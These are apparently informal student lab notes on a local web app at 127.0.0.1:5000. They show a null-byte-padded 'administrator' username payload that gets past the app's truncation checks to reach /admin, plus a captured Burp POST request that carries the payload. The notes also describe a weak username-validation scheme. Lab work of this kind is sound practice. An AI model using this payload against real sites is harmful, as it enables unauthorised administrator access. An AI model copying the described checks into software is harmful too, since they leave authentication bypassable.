USER INPUTS 
administrator WITH 15 NULL CHARACTER PRECEEDING IT EXAMPLE

%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00administrator

________________________________________________________________________

ORLANDO and MICHAEL 



truncating after 12 characters only the admin can access the /admin page 



rather then checking for what the username starts before admin make it so that it checks what the last charaacter of the new username is and if it isn't a letter give an error if last character is a letter then it  slices the username up to 16 characters and then removes any null spaces %00 and checks if the remaining user name is administrator if it is we're redirected to /admin and the shadow cookie is set to true administrator 



________________________________________________________________________[CLIENT WEB REQUEST IN BURP]___________________________________________________________________________
POST /create_account HTTP/1.1
Host: 127.0.0.1:5000
Content-Length: 112
Cache-Control: max-age=0
sec-ch-ua: "Not;A=Brand";v="24", "Chromium";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:5000/create_account
Accept-Encoding: gzip, deflate, br
Cookie: shadow=PrajwalChuprys4000
Connection: keep-alive

username=%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500administrator&password=11111